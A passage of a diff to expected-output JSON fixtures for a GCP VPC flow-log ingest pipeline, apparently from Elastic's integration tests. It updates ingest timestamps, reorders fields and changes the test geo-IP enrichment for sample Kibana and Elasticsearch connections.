"Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34090, 
@@ -6801,6 +7155,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210163Z", + "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:37.712749588Z", + "end": "2019-06-14T03:46:37.827345444Z", + "id": "bnj3cofh3cdki", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6812,7 +7176,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6823,6 +7189,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -6843,28 +7212,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391530600Z", - "original": "{\"insertId\":\"bnj3cofh3cdki\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34090,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:37.827345444Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:37.712749588Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:37.712749588Z", - "end": "2019-06-14T03:46:37.827345444Z", - "id": "bnj3cofh3cdki", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 34178, 
@@ -6878,6 +7237,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210548Z", + "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:46:51.237256499Z", + "end": "2019-06-14T03:46:51.355687385Z", + "id": "bnj3cofh3cdkd", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6889,7 +7258,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -6897,9 +7268,12 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.13" + "67.43.156.14" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -6920,28 +7294,18 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391536100Z", - "original": "{\"insertId\":\"bnj3cofh3cdkd\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":34178,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:46:51.355687385Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:46:51.237256499Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:46:51.237256499Z", - "end": "2019-06-14T03:46:51.355687385Z", - "id": "bnj3cofh3cdkd", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 33064, 
@@ -6955,6 +7319,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415210935Z", + "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:44:40.125336665Z", + "end": "2019-06-14T03:44:40.243022993Z", + "id": "bnj3cofh3cdjw", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -6966,25 +7340,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "67.43.156.14" + "67.43.156.14", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -6995,23 +7368,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391541500Z", - "original": "{\"insertId\":\"bnj3cofh3cdjw\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":33064,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:40.243022993Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:40.125336665Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:44:40.125336665Z", - "end": "2019-06-14T03:44:40.243022993Z", - "id": "bnj3cofh3cdjw", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -7020,11 +7384,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 34906, 
@@ -7032,6 +7401,16 @@ "ip": "67.43.156.14", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415211380Z", + "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:48:50.642206049Z", + "end": "2019-06-14T03:48:50.757255245Z", + "id": "bnj3cofh3cdk3", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -7043,19 +7422,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.14", - "10.87.40.76" + "10.87.40.76", + "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -7066,36 +7456,20 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.391547Z", - "original": "{\"insertId\":\"bnj3cofh3cdk3\",\"jsonPayload\":{\"bytes_sent\":\"1461\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":34906},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:50.757255245Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:50.642206049Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:48:50.642206049Z", - "end": "2019-06-14T03:48:50.757255245Z", - "id": "bnj3cofh3cdk3", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 58216, 
@@ -7109,6 +7483,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415211797Z", + "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:36.865198297Z", + "end": "2019-06-14T03:49:36.982303071Z", + "id": "bnj3cofh3cdkb", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], 
@@ -7120,46 +7504,6 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:13.921Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "67.43.156.13" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, - "event": { - "ingested": "2021-12-09T13:37:46.391552500Z", - "original": "{\"insertId\":\"bnj3cofh3cdkb\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":58216,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:36.865198297Z", - "end": "2019-06-14T03:49:36.982303071Z", - "id": "bnj3cofh3cdkb", - "category": "network", - "type": "connection" } }, { 
@@ -7168,11 +7512,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7250,7 +7599,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391558100Z", + "ingested": "2021-12-14T14:43:27.415212295Z", "original": "{\"insertId\":\"bnj3cofh3cdk4\",\"jsonPayload\":{\"bytes_sent\":\"60222\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33534},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597279654Z\",\"packets_sent\":\"361\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075756033Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075756033Z", 
@@ -7266,11 +7615,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, @@ -7348,7 +7702,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391562800Z", + "ingested": "2021-12-14T14:43:27.415212683Z", "original": "{\"insertId\":\"bnj3cofh3cdkf\",\"jsonPayload\":{\"bytes_sent\":\"61810\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"358\",\"reporter\":\"SRC\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", 
@@ -7359,41 +7713,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "address": "10.87.40.76", - "port": 5601, - "domain": "kibana", - "ip": "10.87.40.76" - }, - "source": { - "geo": { - "continent_name": "America", - "country_name": "usa" - }, - "as": { - "number": 15169 - }, - "address": "67.43.156.13", - "port": 58216, - "bytes": 1467, - "ip": "67.43.156.13", - "packets": 7 - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", - "bytes": 1467, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "inbound" - }, "@timestamp": "2019-06-14T03:50:13.921Z", "ecs": { "version": "1.12.0" @@ -7404,6 +7723,9 @@ "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -7424,8 +7746,33 @@ } } }, + "destination": { + "address": "10.87.40.76", + "port": 5601, + "domain": "kibana", + "ip": "10.87.40.76" + }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 58216, + "bytes": 1467, + "ip": "67.43.156.13", + "packets": 7 + }, "event": { - "ingested": "2021-12-09T13:37:46.391566200Z", + "ingested": "2021-12-14T14:43:27.415213119Z", "original": "{\"insertId\":\"bnj3cofh3cdkl\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":58216},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:36.982303071Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:49:36.865198297Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:49:36.865198297Z", 
@@ -7433,6 +7780,18 @@ "id": "bnj3cofh3cdkl", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:fAWVAPDjem3VSliUyZGusurhkpQ=", + "bytes": 1467, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -7447,11 +7806,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -7523,7 +7887,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.391570400Z", + "ingested": "2021-12-14T14:43:27.415213640Z", "original": "{\"insertId\":\"bnj3cofh3cdk2\",\"jsonPayload\":{\"bytes_sent\":\"136558\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565335113Z\",\"packets_sent\":\"243\",\"reporter\":\"DEST\",\"rtt_msec\":\"16\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500418290Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:13.921248755Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:13.921248755Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500418290Z", 
